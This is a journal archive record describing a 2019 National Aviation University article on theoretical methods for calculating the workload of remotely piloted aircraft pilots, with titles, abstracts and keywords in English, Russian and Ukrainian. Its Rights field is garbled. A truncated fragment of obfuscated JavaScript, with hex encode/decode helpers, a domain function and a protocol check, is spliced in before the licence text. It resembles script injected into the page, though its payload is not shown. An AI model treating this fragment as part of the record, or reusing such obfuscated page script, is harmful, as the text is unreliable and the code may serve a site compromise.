Record Details

THEORETICAL BASIS FOR CALCULATING THE WORKLOAD OF EXTERNAL PILOTS OF REMOTELY PILOTED AIRCRAFT

Наукові журнали Національного Авіаційного Університету

View Archive Info
 
 
Field Value
 
Title THEORETICAL BASIS FOR CALCULATING THE WORKLOAD OF EXTERNAL PILOTS OF REMOTELY PILOTED AIRCRAFT
Теоретические основы расчета загрузки внешних пилотов дистанционно пилотируемых летательныха аппаратов
Теоретичні основи розрахунку навантаження зовнішніх пілотів дистанційно пілотованих літальних апаратів
 
Creator Luppo, Alexander; National Aviation University
Skivka, Alexander; National Aviation University
Palamarchuk, Victor; National Aviation University
Alexeiev, Oleh; National Aviation University
 
Subject
external pilot; remotely piloted aircraft; workload; fatigue, risk; theoretical basis
629.73:681.51

внешний пилот; дистанционно пилотируемый летательный апарат; рабочая загрузка; усталость; риск; теоретические основы
629.73:681.51

зовнішній пілот; дистанційно пілотований літальний апарат; робоче навантаження; втома; ризик; теоретичні основи
629.73:681.51
 
Description The article analyzes the existing methods of determining the workload level. On the basis of the analyzed material new methodological bases for calculating the workload level of external pilots of remotely piloted aircraft were created.  While creating new methodological basis, all the relevant parameters that have an impact on the workload value were defined and grouped. The formulas for calculating these parameters were derived.
В статье анализируются существующие методы определения уровня нагрузки на внешних пилотов. На основе проанализированного материала созданы новые методические основы для расчета уровня загрузки внешних пилотов дистанционно пилотируемых летательных аппаратов. При создании новой методологической основы были определены и сгруппированы все соответствующие параметры, которые влияют на значение рабочей нагрузки. Получены формулы для расчета этих параметров.
У статті аналізуються існуючі методи визначення рівня навантаження на зовнішніх пілотів. На основі проаналізованого матеріалу створено нові методичні основи для розрахунку рівня навантаження зовнішніх пілотів дистанційно пілотованих літальних апаратів. При створенні нової методологічної основи були визначені і згруповані всі відповідні параметри, які впливають на значення робочого навантаження. Отримано формули для розрахунку цих параметрів.
 
Publisher National Aviation University
 
Contributor


 
Date 2019-09-09
 
Type


 
Format application/pdf
application/pdf
application/pdf
 
Identifier http://jrnl.nau.edu.ua/index.php/visnik/article/view/13825
10.18372/2306-1472.79.13825
 
Source Proceedings of the National Aviation University; Том 79, № 2 (2019); 6-11
Вестник Национального авиационного университета; Том 79, № 2 (2019); 6-11
Вісник Національного Авіаційного Університету; Том 79, № 2 (2019); 6-11
 
Language en
 
Rights // o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).
 

Технічна підтримка: НДІІТТ НАУ